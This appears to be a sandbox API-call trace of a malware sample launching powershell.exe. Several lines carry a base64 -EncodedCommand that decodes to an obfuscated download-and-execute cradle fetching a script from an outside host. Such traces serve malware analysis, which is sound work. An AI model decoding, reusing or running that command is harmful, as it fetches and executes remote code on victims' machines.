	[0352.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0352.607] SetErrorMode (uMode=0x1) returned 0x1
	[0352.607] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.607] SetErrorMode (uMode=0x1) returned 0x1
	[0352.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0352.607] SetErrorMode (uMode=0x1) returned 0x1
	[0352.607] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.607] SetErrorMode (uMode=0x1) returned 0x1
	[0352.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0352.608] SetErrorMode (uMode=0x1) returned 0x1
	[0352.608] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.608] SetErrorMode (uMode=0x1) returned 0x1
	[0352.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0352.608] SetErrorMode (uMode=0x1) returned 0x1
	[0352.608] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.609] SetErrorMode (uMode=0x1) returned 0x1
	[0352.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0352.609] SetErrorMode (uMode=0x1) returned 0x1
	[0352.609] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.609] SetErrorMode (uMode=0x1) returned 0x1
	[0352.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0352.609] SetErrorMode (uMode=0x1) returned 0x1
	[0352.609] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x2be920
	[0353.064] FindNextFileW (in: hFindFile=0x2be920, lpFindFileData=0x1c88dcb0 | out: lpFindFileData=0x1c88dcb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0353.064] FindClose (in: hFindFile=0x2be920 | out: hFindFile=0x2be920) returned 1
	[0353.064] SetErrorMode (uMode=0x1) returned 0x1
	[0353.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c88ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0353.065] SetErrorMode (uMode=0x1) returned 0x1
	[0353.065] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c88dfd0 | out: lpFileInformation=0x1c88dfd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0353.065] SetErrorMode (uMode=0x1) returned 0x1
	[0353.066] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0353.066] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.066] CoTaskMemFree (pv=0x1f7f60) 
	[0353.068] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0353.068] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.068] CoTaskMemFree (pv=0x1f7f60) 
	[0353.071] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0353.071] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.071] CoTaskMemFree (pv=0x1f7f60) 
	[0353.081] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0353.081] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.081] CoTaskMemFree (pv=0x1f7f60) 
	[0353.093] CoTaskMemAlloc (cb=0x3b) returned 0x1b75cdf0
	[0353.094] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c88e1b8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c88e1b8) returned 0x4550
	[0353.278] CoTaskMemFree (pv=0x1b75cdf0) 
	[0353.281] GetConsoleWindow () returned 0x1021c
	[0353.288] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0353.288] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.289] CoTaskMemFree (pv=0x1f7f60) 
	[0353.290] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0353.290] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0353.290] CoTaskMemFree (pv=0x1f7f60) 
	[0353.299] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0353.299] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0353.299] CoTaskMemFree (pv=0x1f7f60) 
	[0353.301] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c88e200 | out: pNumArgs=0x1c88e200) returned 0x1b76ec20*=""
	[0353.302] lstrlenW (lpString="-EncodedCommand") returned 15
	[0353.303] CoTaskMemAlloc (cb=0x22) returned 0x1b75d180
	[0353.303] RtlMoveMemory (in: Destination=0x1b75d180, Source=0x1b76ec42, Length=0x20 | out: Destination=0x1b75d180) 
	[0353.303] CoTaskMemFree (pv=0x1b75d180) 
	[0353.303] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0353.303] CoTaskMemAlloc (cb=0x2f4) returned 0x1b768110
	[0353.303] RtlMoveMemory (in: Destination=0x1b768110, Source=0x1b76ec62, Length=0x2f2 | out: Destination=0x1b768110) 
	[0353.303] CoTaskMemFree (pv=0x1b768110) 
	[0353.304] LocalFree (hMem=0x1b76ec20) returned 0x0
	[0353.305] CoTaskMemAlloc (cb=0x804) returned 0x1b768110
	[0353.305] GetConsoleTitleW (in: lpConsoleTitle=0x1b768110, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0353.307] CoTaskMemFree (pv=0x1b768110) 
	[0353.316] CoTaskMemAlloc (cb=0x38e) returned 0x1b76ec20
	[0353.316] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c88e160*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ff2110 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2ff2110*(hProcess=0x380, hThread=0x37c, dwProcessId=0x7f4, dwThreadId=0x724)) returned 1
	[0353.556] CoTaskMemFree (pv=0x1b76ec20) 
	[0353.557] CloseHandle (hObject=0x37c) returned 1
	[0353.557] CoTaskMemAlloc (cb=0x3b) returned 0x1b75cdf0
	[0353.557] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c88e208, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c88e208) returned 0x4550
	[0353.558] CoTaskMemFree (pv=0x1b75cdf0) 
	[0353.562] GetCurrentProcess () returned 0xffffffffffffffff
	[0353.562] GetCurrentProcess () returned 0xffffffffffffffff
	[0353.563] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x380, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c88e2e8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c88e2e8*=0x37c) returned 1

Process:
	id = "17"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x2deef000"
	os_pid = "0x97c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 99
	os_tid = 0xa7c

	[0308.182] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0309.920] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0309.920] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0309.920] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0309.920] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0313.509] sprintf_s (in: _DstBuf=0xaf258, _DstSize=0x11, _Format="get_%s" | out: _DstBuf="get_MemberType") returned 14
	[0319.453] GetVersionExW (in: lpVersionInformation=0xadd60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xadd60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0319.455] GetVersionExW (in: lpVersionInformation=0xadd60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xadd60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0319.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0319.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0319.466] GetVersionExW (in: lpVersionInformation=0xadad0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xadad0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0319.467] SetErrorMode (uMode=0x1) returned 0x1
	[0319.468] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xadc30 | out: lpFileInformation=0xadc30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0319.469] SetErrorMode (uMode=0x1) returned 0x1
	[0319.473] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xadea0 | out: lpdwHandle=0xadea0) returned 0x94c
	[0319.868] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2ce72d8 | out: lpData=0x2ce72d8) returned 1
	[0319.870] VerQueryValueW (in: pBlock=0x2ce72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xade18, puLen=0xade10 | out: lplpBuffer=0xade18*=0x2ce7374, puLen=0xade10) returned 1
	[0319.873] lstrlenW (lpString="䅁") returned 1
	[0319.882] VerQueryValueW (in: pBlock=0x2ce72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xadd88, puLen=0xadd80 | out: lplpBuffer=0xadd88*=0x2ce7450, puLen=0xadd80) returned 1
	[0319.883] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0319.886] CoTaskMemAlloc (cb=0x2e) returned 0x258710
	[0319.886] lstrcpyW (in: lpString1=0x258710, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0319.887] CoTaskMemFree (pv=0x258710) 
	[0319.887] VerQueryValueW (in: pBlock=0x2ce72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xadd88, puLen=0xadd80 | out: lplpBuffer=0xadd88*=0x2ce74a4, puLen=0xadd80) returned 1
	[0319.887] lstrlenW (lpString="System.Management.Automation") returned 28
	[0319.887] CoTaskMemAlloc (cb=0x3c) returned 0x1d8ee0
	[0319.887] lstrcpyW (in: lpString1=0x1d8ee0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0319.887] CoTaskMemFree (pv=0x1d8ee0) 
	[0319.887] VerQueryValueW (in: pBlock=0x2ce72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xadd88, puLen=0xadd80 | out: lplpBuffer=0xadd88*=0x2ce7500, puLen=0xadd80) returned 1
	[0319.888] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0319.888] CoTaskMemAlloc (cb=0x20) returned 0x25eb30
	[0319.888] lstrcpyW (in: lpString1=0x25eb30, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0319.888] CoTaskMemFree (pv=0x25eb30) 
	[0319.888] VerQueryValueW (in: pBlock=0x2ce72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xadd88, puLen=0xadd80 | out: lplpBuffer=0xadd88*=0x2ce7540, puLen=0xadd80) returned 1
	[0319.888] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0319.888] CoTaskMemAlloc (cb=0x44) returned 0x1d8ee0
	[0319.888] lstrcpyW (in: lpString1=0x1d8ee0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0319.888] CoTaskMemFree (pv=0x1d8ee0) 
	[0319.888] VerQueryValueW (in: pBlock=0x2ce72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xadd88, puLen=0xadd80 | out: lplpBuffer=0xadd88*=0x2ce75a8, puLen=0xadd80) returned 1
	[0319.888] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0319.888] CoTaskMemAlloc (cb=0x76) returned 0x200120
	[0319.888] lstrcpyW (in: lpString1=0x200120, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0319.888] CoTaskMemFree (pv=0x200120) 
	[0319.888] VerQueryValueW (in: pBlock=0x2ce72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xadd88, puLen=0xadd80 | out: lplpBuffer=0xadd88*=0x2ce7644, puLen=0xadd80) returned 1
	[0319.888] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0319.888] CoTaskMemAlloc (cb=0x44) returned 0x1d8ee0
	[0319.888] lstrcpyW (in: lpString1=0x1d8ee0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0319.889] CoTaskMemFree (pv=0x1d8ee0) 
	[0319.889] VerQueryValueW (in: pBlock=0x2ce72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xadd88, puLen=0xadd80 | out: lplpBuffer=0xadd88*=0x2ce76a8, puLen=0xadd80) returned 1
	[0319.889] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0319.889] CoTaskMemAlloc (cb=0x58) returned 0x226010
	[0319.889] lstrcpyW (in: lpString1=0x226010, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0319.889] CoTaskMemFree (pv=0x226010) 
	[0319.889] VerQueryValueW (in: pBlock=0x2ce72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xadd88, puLen=0xadd80 | out: lplpBuffer=0xadd88*=0x2ce7724, puLen=0xadd80) returned 1
	[0319.889] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0319.889] CoTaskMemAlloc (cb=0x20) returned 0x25eb30
	[0319.889] lstrcpyW (in: lpString1=0x25eb30, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0319.889] CoTaskMemFree (pv=0x25eb30) 
	[0319.889] VerQueryValueW (in: pBlock=0x2ce72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xadd88, puLen=0xadd80 | out: lplpBuffer=0xadd88*=0x2ce73cc, puLen=0xadd80) returned 1
	[0319.889] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0319.889] CoTaskMemAlloc (cb=0x66) returned 0x254d10
	[0319.889] lstrcpyW (in: lpString1=0x254d10, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0319.889] CoTaskMemFree (pv=0x254d10) 
	[0319.889] VerQueryValueW (in: pBlock=0x2ce72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xadd88, puLen=0xadd80 | out: lplpBuffer=0xadd88*=0x0, puLen=0xadd80) returned 0
